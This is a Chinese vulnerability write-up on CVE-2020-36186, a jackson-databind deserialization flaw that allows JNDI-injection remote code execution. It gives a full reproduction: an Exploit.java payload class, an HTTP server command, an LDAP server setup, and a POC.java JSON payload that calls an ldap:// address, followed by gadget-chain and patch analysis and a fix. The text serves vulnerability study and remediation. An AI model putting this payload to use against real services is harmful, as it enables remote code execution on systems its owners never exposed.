CVE-2020-36186:jackson-databind RCE

2021-04-01 10:11:59 浏览数 (1)

影响范围

Jackson-databind < 2.9.10.7

漏洞类型

JDNI注入导致RCE

利用条件

  • 开启enableDefaultTyping()
  • 使用了commons-dbcp第三方依赖库

漏洞概述

org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。

漏洞复现

环境搭建

pom.xml文件主要依赖如下:

代码语言:html复制
   <dependencies>
        <dependency>
            <groupId>com.fasterxml.jackson.core</groupId>
            <artifactId>jackson-databind</artifactId>
            <version>2.9.10.7</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/tomcat/naming-factory-dbcp -->
        <dependency>
            <groupId>tomcat</groupId>
            <artifactId>naming-factory-dbcp</artifactId>
            <version>5.5.23</version>
        </dependency>
        
        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.2</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
        <dependency>
            <groupId>javax.transaction</groupId>
            <artifactId>jta</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>

漏洞利用

这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~

LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下:

代码语言:javascript复制
import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

编译Exploit.java文件:

搭建HTTP服务

使用Python搭建简易SimpleHTTPServer服务:

代码语言:javascript复制
python -m  SimpleHTTPServer 4444

搭建LDAP服务

使用marshalsec来启动一个LDAP服务:

执行漏洞POC

Poc.java代码如下所示:

代码语言:javascript复制
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;


public class POC {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
        String json = "["org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource", {"dataSourceName":"ldap://127.0.0.1:1288/Exploit"}]";
        Object obj = mapper.readValue(json, Object.class);
        mapper.writeValueAsString(obj);

    }
}

之后运行该程序,成功执行命令,弹出计算器:

漏洞分析

PerUserPoolDataSource类继承自InstanceKeyDataSource:

InstanceKeyDataSource类中存在一处JNDI注入:

testCPDS在PerUserPoolDataSource类的registerPool中被调用:

registerPool在getPooledConnectionAndInfo中被调用:

所以可以构造以下Gadget:

代码语言:javascript复制
PerUserPoolDataSource
	->InstanceKeyDataSource.setDataSourceName
    	->PerUserPoolDataSource.getPooledConnectionAndInfo
        	->PerUserPoolDataSource.registerPool
            	->PerUserPoolDataSource.testCPDS
                	->lookup

补丁分析

官方对于此漏洞的修复方案是将org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource加入黑名单中,但是这种修复方案只能一时间缓解,因为难免会出现其他黑名单绕过方案:

https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1

修复建议

  • 及时将jackson-databind升级到安全版本(>=2.9.10.7)
  • 升级到较高版本的JDK
安全漏洞

0 人点赞